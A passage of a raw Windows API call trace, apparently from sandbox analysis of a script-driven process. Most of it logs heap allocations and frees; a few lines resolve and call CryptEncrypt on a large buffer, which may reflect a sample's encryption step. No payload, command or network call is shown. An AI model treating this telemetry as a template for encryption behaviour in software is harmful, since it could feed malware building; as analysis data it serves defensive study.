out: hHeap=0x970000) returned 1 [0247.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516b8 | out: hHeap=0x970000) returned 1 [0247.571] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2ec5c70 | out: hHeap=0x970000) returned 1 [0247.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.573] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ff0 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0247.573] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0247.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ff0 | out: hHeap=0x970000) returned 1 [0247.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.573] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0247.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0247.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0247.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51790 [0247.573] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.573] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0247.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51610 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0247.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0247.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517c0 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0247.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e515c8 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0247.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0247.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516d0 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.574] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51718 [0247.574] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0247.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516a0 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0247.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b08 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977ae8 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516b8 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0247.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518b0 [0247.575] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0247.575] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x17863) returned 0x2eae400 [0247.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2eae400 | out: hHeap=0x970000) returned 1 [0247.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51868 | out: hHeap=0x970000) returned 1 [0247.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51700 | out: hHeap=0x970000) returned 1 [0247.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51868 [0247.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0247.578] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.578] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e558d8 [0247.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51700 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b28 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977de8 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0247.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0247.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0247.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977de8 | out: hHeap=0x970000) returned 1 [0247.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0247.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0247.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0247.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0247.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0247.579] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0247.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0247.579] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0247.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0247.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0247.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0247.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0247.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0247.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0247.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0247.580] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0247.580] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a30 | out: hHeap=0x970000) returned 1 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0247.581] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0247.581] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0247.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0247.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0247.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0247.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0247.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0247.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0247.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0247.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0247.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0247.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0247.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0247.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0247.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0247.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0247.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0247.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0247.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0247.582] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xd) returned 0x2e51970 [0247.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2e51970, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0247.582] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0247.583] GetProcAddress (hModule=0x756e0000, lpProcName="CryptEncrypt") returned 0x75712cf0 [0247.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0247.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1c) returned 0x2e542d8 [0247.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0247.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0247.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0247.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0247.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0247.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0247.583] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0247.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0247.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0247.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0247.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0247.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0247.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0247.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0247.583] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0247.583] CryptEncrypt (in: hKey=0xa873d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e96b90*, pdwDataLen=0x8cef60*=0x17863, dwBufLen=0x17868 | out: pbData=0x2e96b90*, pdwDataLen=0x8cef60*=0x17868) returned 1 [0247.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e561a8 [0247.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0247.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0247.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0247.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0247.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0247.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0247.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518e0 | out: hHeap=0x970000) returned 1 [0247.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0247.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0247.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0247.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0247.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0247.587] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0247.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518c8 | out: hHeap=0x970000) returned 1 [0247.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0247.587] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0247.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0247.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0247.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a60 | out: hHeap=0x970000) returned 1 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0247.588] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0247.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0247.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0247.588] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0247.588] 